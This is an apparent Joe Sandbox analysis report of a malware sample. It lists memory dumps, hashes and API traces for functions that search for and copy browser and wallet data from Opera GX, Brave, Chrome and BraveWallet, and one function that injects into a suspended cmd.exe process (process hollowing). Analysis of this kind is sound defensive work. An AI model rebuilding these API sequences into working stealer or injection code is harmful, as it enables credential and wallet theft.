Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 4e8930e2ab3841962d2d91a71c00214243edc2ca20c05d22202a2c6b4591578f
Instruction ID: 25879837e25d7b9e9ff72c842b8a10772fe4c447e7889ff283bf84b3da9ea0a5
Opcode Fuzzy Hash: 4e8930e2ab3841962d2d91a71c00214243edc2ca20c05d22202a2c6b4591578f
Instruction Fuzzy Hash: 69F01D71E10159ABDB15EF68DC559EEB7FCEB44200F0005A6A905D3141DA309F459B90

Function 00092541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00092577

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: e405215fcdf82b9c9b467f1f3e821b22018857a0f4bc32b18c08051e44594751
Instruction ID: f607df7ca0eda1f018aa44e83ce0ca4578f6fb8c29478cbeb10c2e693445ed3f
Opcode Fuzzy Hash: e405215fcdf82b9c9b467f1f3e821b22018857a0f4bc32b18c08051e44594751
Instruction Fuzzy Hash: A8E092B0D0420E9FDB44EFA8D9452EEBAF8BF08308F00556AC119F3240E7B942058BA5

Function 0009C32D Relevance: 1.3, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0009C33E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d62670074b24c6e6fe429ad53cee237eec7a6ba2b61b81dff990b1b57181c042
Instruction ID: 8d80e0434eb309004071cb2c1214cec514e87d09ad5bec9dc204ed7fa48e81df
Opcode Fuzzy Hash: d62670074b24c6e6fe429ad53cee237eec7a6ba2b61b81dff990b1b57181c042
Instruction Fuzzy Hash: F92103B4600B108FD720DF6ED085996B7F4FF49324B18886DE68A8B722D772E881CB51

Non-executed Functions

Function 00094CC8 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00094D1C
FindFirstFileA.KERNEL32(?,?), ref: 00094D33
_memset.LIBCMT ref: 00094D4F
_memset.LIBCMT ref: 00094D60
StrCmpCA.SHLWAPI(?,000B69F8), ref: 00094D81
StrCmpCA.SHLWAPI(?,000B69FC), ref: 00094D9B
wsprintfA.USER32 ref: 00094DC2
StrCmpCA.SHLWAPI(?,000B660F), ref: 00094DD6
wsprintfA.USER32 ref: 00094DFF
wsprintfA.USER32 ref: 00094E16

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

_memset.LIBCMT ref: 00094E28
lstrcatA.KERNEL32(?,?), ref: 00094E3D
strtok_s.MSVCRT ref: 00094E82
_memset.LIBCMT ref: 00094E94
lstrcatA.KERNEL32(?,?), ref: 00094EA9
strtok_s.MSVCRT ref: 00094EC2
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00094ED7
DeleteFileA.KERNEL32(?,000B6A28,000B661D), ref: 00094F90
CopyFileA.KERNEL32(?,?,00000001), ref: 00094FA0

Part of subcall function 00092166: CreateFileA.KERNEL32(00094FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00094FAC,?), ref: 00092181

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00094FB6
DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00094FC1
strtok_s.MSVCRT ref: 00094FE7
FindNextFileA.KERNEL32(?,?), ref: 00095105
FindClose.KERNEL32(?), ref: 00095125

Strings

%s\*.*, xrefs: 00094D10
%s\%s, xrefs: 00094E10
%s\%s, xrefs: 00094DBC
%s\%s\%s, xrefs: 00094DF9

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 956187361-332874205
Opcode ID: 67f9fefba9c51d719cab5c753cabafc81def2d95ccb68653e46d051a0c7ec92c
Instruction ID: 0d0bcc4030239634f957fd10976f59da1f7c0772df1d3093051df7e3997f425d
Opcode Fuzzy Hash: 67f9fefba9c51d719cab5c753cabafc81def2d95ccb68653e46d051a0c7ec92c
Instruction Fuzzy Hash: 56C108B2D0021AAFDF22AB64EC499EE77BCAF04304F0145A1FA09B7151DB35AF859F51

Function 00089D1C Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

FindFirstFileA.KERNEL32(?,?,000B67F2,000B67EF,000B7324,000B67EE,?,?,?), ref: 00089DC6
StrCmpCA.SHLWAPI(?,000B7328), ref: 00089DE7
StrCmpCA.SHLWAPI(?,000B732C), ref: 00089E01

Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581

StrCmpCA.SHLWAPI(?,Opera GX,000B7330,?,000B67F3), ref: 00089E93
StrCmpCA.SHLWAPI(?,Brave,000B7350,000B7354,000B7330,?,000B67F3), ref: 0008A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0008A02F
CopyFileA.KERNEL32(?,?,00000001), ref: 0008A0EF
DeleteFileA.KERNEL32(?), ref: 0008A1BE
StrCmpCA.SHLWAPI(?), ref: 0008A1FC
StrCmpCA.SHLWAPI(?), ref: 0008A266
StrCmpCA.SHLWAPI(0008CCE9), ref: 0008A279

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

StrCmpCA.SHLWAPI(?), ref: 0008A35C
CopyFileA.KERNEL32(?,?,00000001), ref: 0008A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0008A4C1
DeleteFileA.KERNEL32(?), ref: 0008A522

Part of subcall function 00088DDB: lstrlenA.KERNEL32(?), ref: 00088FD4
Part of subcall function 00088DDB: lstrlenA.KERNEL32(?), ref: 00088FEF

Part of subcall function 00089549: lstrlenA.KERNEL32(?), ref: 00089970
Part of subcall function 00089549: lstrlenA.KERNEL32(?), ref: 0008998B

StrCmpCA.SHLWAPI(?), ref: 0008A553
CopyFileA.KERNEL32(?,?,00000001), ref: 0008A613
DeleteFileA.KERNEL32(?), ref: 0008A6AA

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

FindNextFileA.KERNEL32(?,?), ref: 0008A76E
FindClose.KERNEL32(?), ref: 0008A782

Strings

\BraveWallet\Preferences, xrefs: 0008A105
Google Chrome, xrefs: 0008A4B9
Brave, xrefs: 0008A00D
Opera GX, xrefs: 00089E8B
Preferences, xrefs: 0008A023

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 4173076446-1189830961
Opcode ID: a842381c68adc029672e52ef683a4d82f9e938823cd58f6a9244107f381a1264
Instruction ID: 00642009eab66e2fce7fb0911208aa6d42b6cd49d9d14a6c8e1be199929617ec
Opcode Fuzzy Hash: a842381c68adc029672e52ef683a4d82f9e938823cd58f6a9244107f381a1264
Instruction Fuzzy Hash: 084204329401299FDF61BB64EC4ABDD77B5BF04304F4501E1F988A7122EB31AE999F81

Function 00095FD1 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00096018
FindFirstFileA.KERNEL32(?,?), ref: 0009602F
StrCmpCA.SHLWAPI(?,000B6AB4), ref: 00096050
StrCmpCA.SHLWAPI(?,000B6AB8), ref: 0009606A
wsprintfA.USER32 ref: 00096091
StrCmpCA.SHLWAPI(?,000B6647), ref: 000960A5
wsprintfA.USER32 ref: 000960C2
wsprintfA.USER32 ref: 000960D9
PathMatchSpecA.SHLWAPI(?,?), ref: 000960EF
lstrcatA.KERNEL32(?), ref: 00096125
lstrcatA.KERNEL32(?,000B6AD0), ref: 00096137
lstrcatA.KERNEL32(?,?), ref: 0009614A
lstrcatA.KERNEL32(?,000B6AD4), ref: 0009615C
lstrcatA.KERNEL32(?,?), ref: 00096170
CopyFileA.KERNEL32(?,?,00000001), ref: 00096229
DeleteFileA.KERNEL32(?), ref: 0009629D
FindNextFileA.KERNEL32(?,?), ref: 000962FF
FindClose.KERNEL32(?), ref: 00096313

Strings

%s\*, xrefs: 0009600C
%s\%s, xrefs: 0009608B
%s\%s, xrefs: 000960D3

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 2178766154-445461498
Opcode ID: ac25859db5a8a8d15da0558459df3f72d60200a4319236d4f76c3f369b3743b3
Instruction ID: 91b50cbb88474c15386d2ba584d57f2aa633db772032c4c5596c3036b98e249f
Opcode Fuzzy Hash: ac25859db5a8a8d15da0558459df3f72d60200a4319236d4f76c3f369b3743b3
Instruction Fuzzy Hash: 95812571D0022DABCF60AB60EC49ACD77B8FF04304F4584E6E588A7151EF35AE898F91

Function 00095B0B Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 179filestringmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00095B30
HeapAlloc.KERNEL32(00000000), ref: 00095B37
wsprintfA.USER32 ref: 00095B50
FindFirstFileA.KERNEL32(?,?), ref: 00095B67
StrCmpCA.SHLWAPI(?,000B6A98), ref: 00095B88
StrCmpCA.SHLWAPI(?,000B6A9C), ref: 00095BA2
CopyFileA.KERNEL32(?,?,00000001), ref: 00095C86

Part of subcall function 0009580D: _memset.LIBCMT ref: 00095845
Part of subcall function 0009580D: _memset.LIBCMT ref: 00095856
Part of subcall function 0009580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00095881
Part of subcall function 0009580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0009589F
Part of subcall function 0009580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 000958B3
Part of subcall function 0009580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 000958C6
Part of subcall function 0009580D: StrStrA.SHLWAPI(00000000), ref: 0009596A

DeleteFileA.KERNEL32(?), ref: 00095CA9
wsprintfA.USER32 ref: 00095BC9

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

FindNextFileA.KERNEL32(?,?), ref: 00095CD8
FindClose.KERNEL32(?), ref: 00095CEC
lstrcatA.KERNEL32(?), ref: 00095D1A
lstrcatA.KERNEL32(?), ref: 00095D2D
lstrlenA.KERNEL32(?), ref: 00095D39
lstrlenA.KERNEL32(?), ref: 00095D56

Strings

%s\%s, xrefs: 00095BC3
K_, xrefs: 00095DE8
%s\*, xrefs: 00095B4A

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
String ID: %s\%s$%s\*$K_
API String ID: 2636950706-416308430
Opcode ID: a92b56f930df125d0ebbf7201293ca731a47f083e58aed1c6272aece546b1ed9
Instruction ID: 6f9789cf2d1545648cf6baece086ff44c10cd08e0d4bd7bb14b227d1d4a51f71
Opcode Fuzzy Hash: a92b56f930df125d0ebbf7201293ca731a47f083e58aed1c6272aece546b1ed9
Instruction Fuzzy Hash: CB714BB1D002289FDF61EB60EC49ADD77B8BF44301F0104E6E649A7152EB31AE85CF55

Function 0008F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0008F57C
CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,000B65A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0008F5A0
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0008F5B2
GetThreadContext.KERNEL32(?,00000000), ref: 0008F5C4
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0008F5E2
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0008F5F8
ResumeThread.KERNEL32(?), ref: 0008F608
WriteProcessMemory.KERNEL32(?,00000000,a-,?,00000000), ref: 0008F627
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0008F65D
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0008F684
SetThreadContext.KERNEL32(?,00000000), ref: 0008F696
ResumeThread.KERNEL32(?), ref: 0008F69F

Strings

a-, xrefs: 0008F550, 0008F620
C:\Windows\System32\cmd.exe, xrefs: 0008F59B

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
